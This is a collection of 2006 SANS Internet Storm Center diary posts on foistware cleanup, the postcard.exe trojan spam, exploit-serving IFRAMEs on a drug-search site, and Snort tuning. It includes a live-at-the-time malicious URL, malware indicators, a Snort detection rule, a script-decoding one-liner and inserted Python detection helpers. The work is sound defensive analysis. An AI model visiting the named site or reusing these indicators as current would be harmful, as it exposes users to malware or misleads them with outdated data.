Published: 2006-12-31

A Look Inside a Dirty Computer

Once again this week I had the opportunity to look at a computer that had been visited by the world of NEWdotNET.

The initial complaint from the computer's owner was that they couldn't connect to the Internet anymore.  The error they were getting was "An error occurred while renewing interface Local Area Connection: the requested service provider could not be loaded or initialized.", along with various protocol errors.  Another error indicated that there was a socket error.  Upon initial investigation I found that NEWdotNET was installed on the computer. 

This is not the first time that I have dealt with a computer that had been lured in by NEWdotNET, so I headed to NEWdotNET's website to check the removal instructions.  Of course, I could not find removal instructions easily, so I searched the web to see what removal instructions I could find.  There in the search results I did find NEWdotNET's webpage with removal instructions.  Following the instructions on the NEWdotNET removal website once again left me less than satisfied with their removal procedures.  In researching the removal of the "garbage" installed by NEWdotNET, I discovered that they are now modifying the Winsock and TCP/IP stack with their own code.  Of course, when you then attempt to remove the programs and settings made by their installs, you are left with a computer that can no longer connect and lots of socket errors.  In spite of the claims from their website that following the removal procedures will remove the software,  I found that it does not.

Off to the Microsoft Knowledge Base to find out what can be done to return the computer to the settings that Microsoft intended XP to have.  I came across a knowledge base article that has the steps needed to determine and recover from Winsock corruption.  So step by step I made my way through the process to recover the Winsock and repair the corruption.


OK, now the Winsock is reset. What about TCP/IP?  I found another article in Microsoft's Knowledge Base that dealt with the TCP/IP stack and the need to reset it after a Winsock error.  So now, step by step, I repair the TCP/IP stack as well.


All is well; the computer is once again running. All of the NEWdotNET leftovers have been removed. 

So what is NEWdotNET?  As far as I can tell they are a DNS provider. From their website "NEW.NET seeks to become the world's leading domain name registry by introducing and selling domain names with new extensions that offer greater relevance and meaning than current Web site addresses ending in .com, .net, and other existing top-level domains. We are making this possible initially by encouraging millions of users to activate their Internet browsers to recognize NEW.NET domain names and partnering with leading Internet Service Providers to activate our domain names automatically at the network level."

Sounds innocent enough; however, in order for me to see those web pages that have the other extensions, I have to have their software installed.  Their software is a plug-in to the browser that you are using.  According to Counter Exploitation's site:


"The NewDotNet software is what we like to call Foistware: it's something that you probably didn't ask for, and never felt a need for, but it came along anyway with an unrelated program you downloaded. NEWdotNET accomplishes this by compensating the authors of unrelated third-party software, which has ranged from media players to peer-to-peer file sharing programs, for "bundling" the browser plugin with their program. At one time, NEWdotNET advertised a 5 cent commission for each system the plugin was successfully installed on; however, we are unable to find current published figures for compensation."

It appears that NEWdotNET is not happy about the adverse publicity that their software has received over the years.  They claim that their software is not being installed without the permission of the owner of the computer.  I really take issue with this.  Of the computers that I have worked on that have had the software installed, I cannot find one person who confirmed that they knew that NEWdotNET was being installed and agreed to the installation. 

From the website… they themselves claim to have 174,661,619 enabled users.  My question is how many of the nearly 175 million users even know that the software is installed?  How many agreed to the installation?  How many realize that the software leaves the computer open so that newdotnet can update the software whenever an update comes along (and by the way doesn't inform the user that an update is being done)?

(I would really like to know how many people actually remember being asked to install the newdotnet software.)

This computer may well have been the biggest challenge that I dealt with in 2006.  Some of you are probably saying, "Man, why don't you just format and reinstall?"  Sometimes I do, but if I didn't go through these types of exercises I would never know how this stuff works, I would not understand what to look for next time and would not be able to help people understand the importance of things like anti-virus software, anti-spyware software and firewalls. 

I encourage each of our readers to take a look at what programs are running on your computers.  Make sure that the computers in your home, especially community computers, are free from spyware, viruses and the like.  Make a resolution for 2007 to clean up your computers, check out the programs that are running on them and make sure that you understand what they are.  Make sure that your anti-virus and anti-spyware software are up-to-date and that you have a good firewall in place.

With that I wish each and every one of you a Happy New Year and a safe and prosperous 2007.


Published: 2006-12-31

Windows Defender expires today

For those of you using Windows Defender just wanted to remind you that the old version expires today.  Microsoft has a new version available for download at Windows Defender Update.

We have received a report from one of our readers that his Windows Defender install just stopped working, with no warning other than a service failing to start. Thanks for reporting this to us, Karl. Is anyone else seeing this behaviour?

If you are running Windows Defender you may want to do the update today. 

Update:  It has been brought to our attention that Microsoft Windows Defender is no longer installable or supported for Windows 2000.  Microsoft states that W2K is out of lifecycle and is no longer supported.  So those of you running Windows Defender on Windows 2000, you will need to look for another program. 


Published: 2006-12-31

Update on Postcard virus emails

One of our readers made an interesting observation, one which I have confirmed with the headers of the emails that I have received with the Nuwar virus.  All of the emails have a common user agent:  Thunderbird (Windows/20061207).  I am not sure of the significance of this, but it is an interesting observation.

Thanks Karl for the information.


Published: 2006-12-30

Postcard.exe - Let the mutations begin

At this time, we have received one report from reader Thomas who reports having seen variants of the email containing the postcard.exe attachment as previously reported. These variants may be changing the subject lines, but are definitely changing the executable name. Reported name variants are "greeting card.exe", "greeting postcard.exe" and "GreetingCard.exe". I have been unable to independently validate whether or not this variation is now widespread and the AV sites don't seem to be mentioning it yet. Write in and let us know if you're seeing these variants as well and send in samples if you can so we can determine if it's just a renamed version of the original or if there are other changes occurring in the code as well.

Update UTC1655: Several respondents have confirmed the behavior reported by Thomas. Known variations are as follows:

greeting card.exe
Greeting Card.exe
greeting postcard.exe
Greeting Postcard.exe

Subject lines appear to be changing with a much larger bank of possibilities. I anticipate AV vendors will begin to document this. A list was provided by reader Diego. This is a good start, but most likely partial:

Annual Fun Forecast!
Baby New Year!
Best Wishes For A Happy New Year!
Fun 2007!
Fun Filled New Year!
Happiness And Continued Success!
Happiness And Success!
Happiness In Everything!
Happy 2007!
Happy New Year!
Happy Times And Happy Memories!
May Your Dreams Come True!
New Hopes And New Beginnings!
New Year... Happy Year!
Promises Of Happy Times!
Raising A Toast To Happy Times!
Scale Greater Heights!
Sparkling Happiness And Good Times!
Warm New Year Hug!
Warmest Wishes For New Year!
Welcome 2007!
Wish You Smiles And Good Cheer!
Wishing You Happiness!
Wishing You Happy New Year!

Update UTC1845:

Reader Ken sent a note about two snort rules that are triggering against emails associated with this virus. The first rule can not be published here as it is a licensed rule under vrt license, which can be obtained from snort.org. Specifically it is used for detecting netsky attachments and has a sid of 9425.

The other rule, however, is public domain. Here it is:
VIRUS OUTBOUND bad file attachment

alert tcp $HOME_NET any -> $EXTERNAL_NET 25 (msg:"VIRUS OUTBOUND bad file attachment";flow:to_server,established;content:"Content-Disposition|3A|";
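As an added example (not from the diary or from its readers), the Python below applies the idea behind the outbound-attachment rule to a raw message: it parses the headers and MIME parts, compares the subject and attachment name against the variant lists above, and flags executable extensions. The sample message and the extension list are constructed assumptions.

```python
import email
from email import policy

# Filename variants reported by readers above; matched case-insensitively so
# "greeting card.exe" and "Greeting Card.exe" collapse to one entry.
KNOWN_ATTACHMENT_NAMES = {
    "postcard.exe",
    "greeting card.exe",
    "greeting postcard.exe",
    "greetingcard.exe",
}
# Subject lines from reader Diego's list above, lower-cased for comparison.
KNOWN_SUBJECTS = {s.lower() for s in [
    "Annual Fun Forecast!", "Baby New Year!", "Best Wishes For A Happy New Year!",
    "Fun 2007!", "Fun Filled New Year!", "Happiness And Continued Success!",
    "Happiness And Success!", "Happiness In Everything!", "Happy 2007!",
    "Happy New Year!", "Happy Times And Happy Memories!", "May Your Dreams Come True!",
    "New Hopes And New Beginnings!", "New Year... Happy Year!", "Promises Of Happy Times!",
    "Raising A Toast To Happy Times!", "Scale Greater Heights!",
    "Sparkling Happiness And Good Times!", "Warm New Year Hug!",
    "Warmest Wishes For New Year!", "Welcome 2007!", "Wish You Smiles And Good Cheer!",
    "Wishing You Happiness!", "Wishing You Happy New Year!",
]}
# Executable-type extensions worth flagging regardless of name (an assumption:
# a typical subset of what a "bad file attachment" mail rule covers).
DANGEROUS_EXT = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "hta"}

# Constructed sample message modelled on the reports above; the base64 body is
# filler, not a real binary.
SAMPLE_RAW = (
    "From: friend@example.invalid\r\n"
    "To: victim@example.invalid\r\n"
    "Subject: Happy New Year!\r\n"
    "User-Agent: Thunderbird (Windows/20061207)\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="XYZ"\r\n'
    "\r\n"
    "--XYZ\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "You have received a postcard!\r\n"
    "--XYZ\r\n"
    'Content-Type: application/octet-stream; name="Greeting Card.exe"\r\n'
    'Content-Disposition: attachment; filename="Greeting Card.exe"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n"
    "AAAAAAAA\r\n"
    "--XYZ--\r\n"
)


def inspect_message(raw):
    """Parse a raw RFC 822 message and report the indicators found in it."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = str(msg["Subject"] or "").strip()
    agent = str(msg["User-Agent"] or "").strip()
    attachments = []
    for part in msg.walk():
        # Only MIME parts declared as attachments carry a filename to check.
        if part.get_content_disposition() != "attachment":
            continue
        name = (part.get_filename() or "").strip()
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        attachments.append({
            "filename": name,
            "known_variant": name.lower() in KNOWN_ATTACHMENT_NAMES,
            "dangerous_extension": ext in DANGEROUS_EXT,
        })
    return {
        "subject": subject,
        "known_subject": subject.lower() in KNOWN_SUBJECTS,
        "user_agent": agent,
        "attachments": attachments,
        # An executable attachment is enough on its own; the subject and the
        # User-Agent are corroborating context, not the deciding factor.
        "suspicious": any(a["dangerous_extension"] or a["known_variant"]
                          for a in attachments),
    }
```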


Published: 2006-12-29


We've received word from a number of readers that "postcard.exe" is currently being spammed in emails with the subject "Happy New Year". AV coverage is still thin. MD5: 4adf7a3719c485a4e482498874b6695f

Update 1530UTC:  AV protection coming online: Trojan-Downloader.Win32.Tibs.jy (Kaspersky), W32/Dref-U (Sophos), W32.Nuwar.AY (TrendMicro). ClamAV was one of the first AVs to have protection available when the wave started last night; they are calling it Downloader-388.

There is also a set of BleedingSnort Sigs available which helps in detecting an existing infection (systems reporting to C&C).

Update 1400UTC: Symantec has thrown their hat in the ring with W32.Mixor.Q@mm.


Published: 2006-12-29

Pain reliever with serious side effects

Relax, you pundits of the pristine ISC blog, we are not going off-topic again. This story is about what can happen when you use a popular search engine in an attempt to look up side effects of a prescription drug. This happened when Louis entered "Percocet" (a pain medication) and made the mistake of clicking on the least sensible search result: http://www. pharmacy. topsearch20.net/search.php?q=percocet
I recommend you continue reading before you do as Louis did and click on the above, because the page returned, in addition to peddling cheap drugs, also includes two nifty IFRAMEs:

Again, these are - at the time of writing - live URLs, hosting bad stuff. Don't go there. Or, if you must, at least don't complain to us if you turn your PC into a brick while "investigating" the site.

statrafongon[dot]biz resolves to, which in itself already is an indication that something fishy could be waiting there - this IP range ( is one of the address segments used by the CoolWebSearch gang in Russia to propagate their toys. Let's look at what they serve this time:

new.php?adv=8 contains a copy of the MS06-014 (MDAC/RDS.Dataspace) exploit. The exploit used is lifted pretty much verbatim from the Metasploit framework; in fact the successful exploit would even write the downloaded malware as "metasploit.exe" to the disk.

strong/08/index.html contains obfuscated JavaScript:

While the Tom Liston Method(tm) to unravel such scripts is highly effective, I still prefer to do my unstuffing in Perl under Unix: $ cat index.html | perl -pe 's/\%(..)/chr(hex($1))/ge' does the trick easily, and shows us that the page includes no less than five IFRAMEs, named exp1.htm to exp5.htm. Downloading and looking at each of these files individually, we found the following:

exp1.htm contains a different exploit for the same MS06-014 (RDS) vulnerability already seen above.
exp2.htm contains yet another stab at MS06-014.
exp3.htm goes after the WebViewFolderIcon (MS06-057) hole, again borrowing the code practically unchanged from Metasploit.
exp4.htm contains an exploit of the VML vulnerability (MS06-055).
exp5.htm goes after the recent XML core services bug (MS06-071), and is using a copy of the PoC code posted at milw0rm.
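As an added example that is not part of the original diary, the Python below does what the Perl one-liner does (replaces each %XX escape, repeated in case the author stacked layers) and then lists the IFRAME sources the decoded page loads. The obfuscated input is a constructed sample, not the real index.html.

```python
import re

# Constructed sample of a %XX-escaped page (not the real strong/08/index.html)
# that unescapes to a hidden DIV holding five IFRAMEs, exp1.htm to exp5.htm.
SAMPLE_OBFUSCATED = (
    "<script>document.write(unescape('%3Cdiv%20style%3D%22display%3Anone%22%3E"
    + "".join(
        f"%3Ciframe%20src%3D%22exp{i}.htm%22%20width%3D1%20height%3D1%3E%3C/iframe%3E"
        for i in range(1, 6)
    )
    + "%3C/div%3E'))</script>"
)

PERCENT_RE = re.compile(r"%([0-9A-Fa-f]{2})")
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def unescape_once(text):
    """Same substitution as the perl one-liner: each %XX becomes chr(0xXX).
    Unlike perl's hex(), a non-hex pair is left untouched rather than mapped to 0."""
    return PERCENT_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def unescape_layers(text, max_rounds=5):
    """Repeat the unescape while it still changes something (nested layers)."""
    for _ in range(max_rounds):
        decoded = unescape_once(text)
        if decoded == text:
            break
        text = decoded
    return text


def hidden_iframes(text):
    """Unescape the page and return the src of every IFRAME it loads."""
    return IFRAME_SRC_RE.findall(unescape_layers(text))
```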

The strategy to use five exploit variants seems to work - when I tested these files with some AV products, none was able to spot all five attempts. When successful, all five exploits would try to download and run a "win32.exe" off the same site. At the time of discovery (when Louis stumbled onto the site), win32.exe brought back a blank screen at Virustotal. By now, the situation has improved a bit.

The lesson learned? As far as we could determine, nothing happened to Louis' PC. Not because of his Antivirus, only because his PC was diligently patched. Otherwise, this pain reliever could have had serious side effects.

Update 29DEC 1025 UTC:  When I hacked in this diary late yesterday night, little did I know that the next day would bring a surprise. The surprise being that the "win32.exe" of this exploit is called Trojan-Downloader.Win32.Tibs.jy by Kaspersky. Same malware, apparently, that is currently being spammed as "postcard.exe", even though the file sizes and MD5 checksums differ.


Published: 2006-12-28

Cacti remote code and SQL injection vulnerability

Secunia has published a bulletin regarding vulnerabilities in the popular open-source network management web application, Cacti (versions <= 0.8.6i which is the current version).  The vulnerabilities include SQL injection and possible remote code execution.  There is public proof-of-concept code available.  If you run Cacti, you are urged to read the work-arounds in the bulletin until a patch/new version is released.

Secunia bulletin: http://secunia.com/advisories/23528/
CVE: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-6799
Cacti home: http://www.cacti.net

Jim Clausing,  jclausing %% at %% isc dot sans dot org


Published: 2006-12-28

What should I do with these gift cards?

My kids never know what to get me for birthdays or Christmas, so they get me gift cards to <insert electronics chain here> and <insert bookstore chain here>, which frankly is fine with me.  So the question for our faithful readers is what should I use these gift cards to buy this year?  I've read 4 of the 7 books on Richard Bejtlich's  Digital Security Postgraduate School, 4 of the 7 on his Digital Security War College, and 6 of the 7 on his Digital Security Bootcamp lists, but what other ones should I look at?  How about cool new gadgets?  I've got a friend who has a USB HDTV receiver/tuner to watch over-the-air HDTV, he thinks I should look at one of those, what do you think?  I'll collect responses and post your thoughts next week.

Jim Clausing, jclausing ++ at ++ isc dot sans dot org


Published: 2006-12-28

Port 32000 spike, got packets?

We've noticed in the dshield data and from some of our users, that there was a very large spike in activity on TCP port 32000 yesterday.  While it appears that the vast majority of this traffic seems to be coming from one source IP, it also seems to have hit a large chunk of internet address space.  At this point, the spike may very well be over, but if anyone has more than just SYN packets (like had a netcat listener on that port) and can share the packets with us so we can try to figure out what application they might have been looking for, please submit via the contact page.

Jim Clausing, jclausing -- at -- isc dot sans dot org


Published: 2006-12-28

Archiving the snort tips

Folks, we're in the process of moving Joel's snort article over to his personal handler page where it will be archived for the longer term.  In the meantime it is still available here, until it shows up here.


Published: 2006-12-27

The Snort Top 10

I work with SNORT®..... constantly. It's my job to do so. I've been using Snort for many years, I teach classes on how to configure it, I teach classes on how to write Snort rules. I've been using Snort and setting up Sourcefire and Snort devices on hundreds of different networks for years on end now.

I am frequently asked questions, many of the questions are the same things over and over again, and I always see the same mistakes being made when setting it up. So, I've compiled a list of the top ten mistakes and commonly misconfigured or overlooked things when configuring everyone's favorite IDS.

None of these override the necessity to read the Snort manual, however. The manual supersedes all Snort books, because as great as these books are, they can't keep up with the pace at which Snort is updated. So here goes...

1. The Snort.conf file.
Almost all your options are set in this file. This file should be read line by line, from top to bottom, taking the time to fully understand what each one of the configuration options does. 90% of all the questions I get can be answered by just reviewing the documentation in the snort.conf file.

2. Variables.
At the very top of the Snort.conf file there are variables to be set. The very least of which is "HOME_NET". HOME_NET should ALWAYS be configured. Depending on the placement of your IDS, your HOME_NET is loosely interpreted as "whatever the Snort box is protecting". For instance, on my network, it's The whole network is controlled by my router, and no other IP addresses should be on the network unless it has this range. If I *had* other IP's pop on my network, I would definitely not want them treated as mine! Common settings for HOME_NET may be your whole internal network range, such as any RFC 1918 addresses. Depending upon the placement of your sensor (such as at your border) you may want to have your public IP address space in your HOME_NET as well. Remember that only CIDR notation is accepted within the variable notation. won't work, neither will Only will. Another big thing to note is your setting for EXTERNAL_NET. By default, EXTERNAL_NET is set to "any". "Any" includes your HOME_NET. In order to make Snort treat traffic that is NOT in your HOME_NET as EXTERNAL, you can set your EXTERNAL_NET to "!$HOME_NET". Which setting applies to you is dependent upon the placement of your sensor.

3. Frag3 preprocessor.
Snort is able to handle many different types of evasion. One of the big ones that people think they can slip past any IDS is IP fragmentation, or using malicious overlapping and underlapping fragments, in order to slip the payload past your IDSs but have it reassembled correctly on the target.

Okay.. I realized I may have just thrown a big ball at you... Let's back up.

IP fragmentation is when Packet A on Network A is too big to go onto Network B. So the router on the Network A side splits Packet A into Packet A.1, A.2, A.3, and so on, so it's able to fit onto Network B. However, these smaller packets aren't put back together until they reach the final destination IP. Still with me so far right? Cool...

The problem with that is, different operating systems put fragmented packets back together in different orders. (And you thought they were all the same!) Well, the problem with IDSs is, they have absolutely no idea what the operating systems are that they are protecting. Frag3 allows you to tell it. Now, without writing a book about the subject, you need to go into the docs/ directory that is enclosed with your Snort tarball and read the README on frag3. (As well as the accompanying section in the Snort manual.)

However, in order to FULLY understand what I am talking about, go read the whitepaper written by Judy Novak. (You have to register to download it) She's one of the authors of the SANS 503 IDS course, one of the designers behind frag3, and currently a Vulnerability Research Team (VRT) employee at Sourcefire.

4. HTTP Inspection preprocessor.
The most misunderstood preprocessor there is. This preprocessor analyzes, normalizes, and alerts on http traffic. The thing to remember is, it's SERVER based. It's meant to analyze traffic coming inbound to your http SERVERS. It basically has two settings, the "global default" setting, which you should set to the majority of your web servers. For instance, are most of your web servers IIS, on port 80?  Then you need to set that to the global setting.  If only some of your web servers are not IIS, or  only some of them are not on port 80,  then those need to be specified INDIVIDUALLY, by IP! Does that mean you will have to create a separate line for each of your "non-standard" web servers? Yes! That's the way it's SUPPOSED to work!

5. Portscan preprocessor.
Also a very misunderstood piece of code. You need to read the README for the "sfportscan" preprocessor in the docs/ directory. There is no better explanation on how to configure this preprocessor.

6. The rest of the preprocessors, to include the new "dynamic" preprocessors.
All of the preprocessors have configuration lines. Each need to be configured to the networks you are protecting with Snort. Review the documentation for each of them extensively. All the documentation is well written, and is written with the user in mind.

7. Rules.
The Rules in Snort are key. At the bottom of the Snort.conf you will see a bunch of "include" lines. "include $RULE_PATH/web-iis.rules" for example. This line will call the rules file web-iis.rules and load it in at runtime. A lot of people ask "what is the best ruleset to run?" Well, by far the first and foremost ruleset to run is the VRT ruleset, available after registration here. However, does this mean that you need to run every rule in that ruleset? NO! Take a look at the categories.. pop3.rules, imap.rules, oracle.rules, web-coldfusion.rules, pop2.rules, mysql.rules.. etc... Do you run these services on your network? Do you run pop3? Do you run pop2? Do you run imap? No? Then turn the rule category off! There is no sense in running rules that have no application to your network! All you are doing is potentially creating more work for yourself through false positives, as well as making the Snort engine work harder than it needs to.

"But I hear there are other rulesets besides the VRT set!" YES! There are. There are basically two. The BleedingThreats set available at www.bleedingthreats.com and the Community ruleset. Each of these rulesets is contributed to regularly by YOU the Snort community and each has its own pros and cons. Should you run all three rulesets? Sure! However, you need to go through each rule file, and turn on/off what you are not interested in or what does not apply to your network. For example, do you have Veritas on your network? No? Then go into exploit.rules and shut off the Veritas rules.

8. Output.
Snort can output to syslog, to pcap format (default), to a database, or lastly, to Unified. The "official" recommendation is unified. The unified file format is the fastest output format coming out of the backend of Snort. Especially when you are trying to output to a database! When Snort has to output to a database directly, it has to perform an INSERT into the db... doing so is CPU intensive. Do you want your IDS to be an IDS? Or a database insertion tool?  So use Unified! Well, the problem with unified is, you need something that reads unified file format and outputs it into the db, or tcpdump file format you want....

9. Barnyard (or FLoP)
Barnyard reads the unified file format and inserts what it finds into a db, or outputs into tcpdump file format. FLoP is another tool that also reads Snort's output (albeit in a different method) and does what you want with it. Both are excellent tools; check out both and use the one that's appropriate to you.

10. Rule updates.
However you choose to update your rules is up to you, I recommend Oinkmaster. Nice perl proggie to keep your rules up to date. Just don't forget to register on Snort.org and get your oinkmaster code if you wish to download the VRT registered user set.

Notice that I didn't put a recommendation for any type of Snort log reviewing tool. BASE, Sguil, Placid, etc.. all have their merits and you will want to check out the one that is most appropriate to your situation. However, I do have one recommendation that I will make here... and it's turning into more of a "RULE" now. Do NOT use ACID. Don't get me wrong, ACID was great for its day, however, with over 200+ bug fixes, feature implementations, and the fact that ACID hasn't been updated in.. going on 4 years now... go with BASE if all you are looking for is an Alert browser. BASE works with your existing ACID db, and is very easy to upgrade to.
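As an added example that is not Joel's or Sourcefire's code, the Python below lints a snort.conf against points 2, 7 and 8 of this list: HOME_NET left unset or "any", EXTERNAL_NET left at "any", rule categories included for services the network does not run, and direct database output instead of unified. The sample configuration and the set of services in use are constructed assumptions.

```python
import re

# Constructed sample snort.conf fragment (not from the article) that makes
# several of the mistakes listed above: HOME_NET left at "any", EXTERNAL_NET
# at its default "any", direct database output, and rule categories included
# for services this network does not run.
SAMPLE_CONF = """\
var HOME_NET any
var EXTERNAL_NET any
var RULE_PATH ../rules
preprocessor frag3_global: max_frags 65536
preprocessor frag3_engine: policy first detect_anomalies
preprocessor http_inspect: global iis_unicode_map unicode.map 1252
preprocessor http_inspect_server: server default profile all ports { 80 8080 }
output database: log, mysql, user=snort dbname=snort host=localhost
include $RULE_PATH/web-iis.rules
include $RULE_PATH/pop3.rules
include $RULE_PATH/pop2.rules
include $RULE_PATH/oracle.rules
"""

# Rule categories matching services actually offered on the monitored network
# (an assumption for the sample); any other included category is a candidate
# to disable.
SERVICES_IN_USE = {"web-iis", "web-misc", "smtp", "dns"}

VAR_RE = re.compile(r"^\s*(?:var|ipvar)\s+(\w+)\s+(.+?)\s*$")
INCLUDE_RE = re.compile(r"^\s*include\s+\$RULE_PATH/([\w-]+)\.rules\s*$")
OUTPUT_RE = re.compile(r"^\s*output\s+(\w+)\s*:")


def lint_snort_conf(conf_text, services_in_use):
    """Return a list of (check, detail) findings for the given snort.conf text."""
    variables, includes, outputs = {}, [], []
    for line in conf_text.splitlines():
        line = line.split("#", 1)[0]  # drop trailing comments
        if m := VAR_RE.match(line):
            variables[m.group(1)] = m.group(2)
        elif m := INCLUDE_RE.match(line):
            includes.append(m.group(1))
        elif m := OUTPUT_RE.match(line):
            outputs.append(m.group(1))

    findings = []
    home = variables.get("HOME_NET")
    if home is None or home.lower() == "any":
        findings.append(("HOME_NET",
                         "set HOME_NET to the CIDR block(s) the sensor protects; "
                         "unset or 'any' treats every address as yours"))
    if variables.get("EXTERNAL_NET", "any").lower() == "any":
        findings.append(("EXTERNAL_NET",
                         "'any' includes HOME_NET; consider !$HOME_NET"))
    if "database" in outputs:
        findings.append(("OUTPUT",
                         "direct database output makes the engine do INSERTs; "
                         "log to unified and let Barnyard load the database"))
    unused = sorted(cat for cat in includes if cat not in services_in_use)
    if unused:
        findings.append(("RULES",
                         "rule categories for services not in use: " + ", ".join(unused)))
    return findings
```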

So there you go. I hope this helps a bit to get you started down the correct path of tuning Snort. Don't forget to hit the mailing list archives, post to the mailing lists with any questions, look for your local Snort User Group, visit the Snort Forums, or even write into us here at the ISC (several of us use Snort constantly, not just me).. or drop into irc.freenode.net into #snort and say hello! Thanks!

Stay tuned for another article on Snort in the future.. If you have suggestions about what I should write about as far as Snort goes, feel free to write in!

/** Joel Esler **/

Copyright 2006 Sourcefire, Inc. All Rights Reserved.  Sourcefire and Snort are registered trademarks of Sourcefire.


Published: 2006-12-27

Christmas Botnet Follow-up

In response to yesterday's diary entry on the drop in botnets right before Christmas, Claude wrote to us with an interesting theory.  Here is what he said:

From the dshield reports, I do also see a (small) drop in the number of scans during the last day, both at home and on the office firewall, about 10% less sources & hits.

My thoughts to explain this drop are the following : the new (unpatched) computers replaced the old (infected) ones, so the global number of bots has decreased. 99.9% of the new computers must be Windows XP SP2 with firewall turned on - and that's why the new computers are not yet infected. XP firewall does a fair job in protecting a computer from the most common attacks *from the outside* (137,139,135 & 445 are closed), allowing to visit windowsupdate and download the missing patches.
So my assumption is that 99% of the new computer will stay clean ... at least until their users begin to click each and every popup on the screen, install an IM program and receive xmas & ny wishes in their mailboxes.

My guess is we will see a slow rise in the botnet size over the next month, until most of the new computers are infected again with malware - not because they were unpatched from the start, but because the users received no education with their new toy. Why can't you buy that at Walmart too ?

Great analysis, Claude!  I think you've nailed it.  Many of the infected machines are turned off, the new shiny ones have not been infected, and the Internet is momentarily a safer place.  But like you said, give it a few weeks and we'll be right back to where we started from.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-27

Taiwan Earthquakes cut undersea cables

A number of readers submitted reports of Internet slowness to/from Asia. We now know that this is a direct result of up to six submarine cables being severed during a series of temblors off the coast of Taiwan. From Bloomberg:

"Taiwan was jolted by three earthquakes yesterday, killing two people
and injuring 42 others, the island's National Fire Agency said. The
tremors damaged undersea cables, causing a disruption to Internet
traffic and some telephone calls in the region for customers including
Singapore Telecom, PCCW, Chunghwa Telecom Co., Taiwan's biggest
telephone operator, and KDDI Corp., Japan's second-largest telephone

Our thoughts and prayers go out to all who have been lost or injured in the quakes and to their friends & families.


Published: 2006-12-27

US President Ford Dies

The news is breaking, and only a few sites are carrying the story.  Former US President Ford died a few minutes ago.  Details will be coming out soon on all of the major news outlets.  Our condolences to Mrs. Ford and the Ford family.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-26

DNS Misbehaving

[see the update below - the problem is with Rogers Cable]

A reader reported some difficulties resolving www.zonelabs.com from Canada.  We checked our circuits and two different sites (one in Belgium, one in the USA) showed this:

From Belgium:
$ dig www.zonelabs.com a

; <<>> DiG 9.2.2 <<>> www.zonelabs.com a
;; global options:  printcmd
;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49741
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;www.zonelabs.com.              IN      A

www.zonelabs.com.       86400   IN      A

zonelabs.com.           86400   IN      NS      dns1.zonelabs.com.
zonelabs.com.           86400   IN      NS      dns2.zonelabs.com.

From the USA:
~> dig www.zonelabs.com

; <<>> DiG 9.2.3 <<>> www.zonelabs.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61680
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0

;www.zonelabs.com.              IN      A

www.zonelabs.com.       86245   IN      A

zonelabs.com.           86245   IN      NS      ns8.checkpoint.com.
zonelabs.com.           86245   IN      NS      dns1.zonelabs.com.
zonelabs.com.           86245   IN      NS      dns2.zonelabs.com.
zonelabs.com.           86245   IN      NS      ns6.checkpoint.com.

We asked our Canadian friend to run a dig query and here was his output:

 dig www.zonelabs.com a

; <<>> DiG 9.3.1 <<>> www.zonelabs.com a
;; global options:  printcmd
;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46367
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;www.zonelabs.com.              IN      A

www.zonelabs.com.       3600    IN      A

zonelabs.com.           86400   IN      NS

I removed the DNS server IP addresses for privacy purposes, but you can clearly see what the problem is.  His ISP's DNS server returns an address of as an answer.  This could be a local cache problem with his ISP or an indicator of a much larger attack. 

We need your help - run a dig query against your local DNS servers for www.zonelabs.com and let us know if you see as the reply.  No need to let us know if the queries come out OK, just if you see  Please use our contact page for submissions.


Marcus H. Sachs
Director, SANS Internet Storm Center

Numerous readers have written in to let us know that the problem appears to be solely with Rogers Cable DNS servers. There is no indication at this point that there is anything malicious afoot, although anytime a security software update site resolves incorrectly we need to dig into it.

There have been discussions in other forums about Rogers DNS problems, although we cannot determine if those are related to the zonelabs.com problem.

For the time being, Rogers customers may wish to change your DNS server settings to use one of the free public servers listed at http://www.opennic.unrated.net/public_servers.html or http://www.opendns.com/.

Thanks to everyone who responded!


Published: 2006-12-26

Ghost of Christmas Botnets?

One of our handlers said that he saw a significant spike in botnet activity to known C&Cs yesterday.  That would make sense, considering the millions of new computers that joined the Internet soup on Christmas day, right out of the box, and likely a few months behind on patches.  However, when we looked at our favorite botnet tracking site, ShadowServer, we see that there was just the opposite - a big DROP in botnets on Christmas Eve and very little rise on Christmas Day.  Very odd.

So, what are your sensors seeing?  A rise in botnet activity or a drop?  Send us your observations via our contact page.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-26

Vista: better security [Y/N] ?

I went to a talk about Microsoft's Vista a little while ago; from what I remember of the presentation, here are some highlights of the security impact of Vista:
  • Vista has what Microsoft calls "defense in depth". Most of us think of something with multiple devices creating layers, but Microsoft uses the term for a mechanism inside a machine that gives processes and resources a level of trust. Low-level processes cannot access higher-classified assets.
    • IE has been given a low trust level. After asking questions it was still unclear if outlook would be low as well. It seemed the answer pointed to the attachments being low but outlook and the emails themselves not. But I might have misunderstood.
    • User processes are at a medium trust level.
    • Service processes are at a high level.
    • System is still the highest trust level.
  • Even when logged on with local admin rights, processes are not started by default with those rights. The demo was rather convincing with notepad refusing to save a file in c:\windows\ even though the user had admin rights. To start the application the local admin needs to right click and start notepad with additional rights.
  • There is a "secure desktop" used for switching users, logging in and being prompted for allowing additional rights needed by processes. The normal desktop is grayed out during such prompts making them rather hard to ignore. Note: the default is not accept but cancel. This secure desktop should somehow (unspecified how) make it more secure to do these prompts.
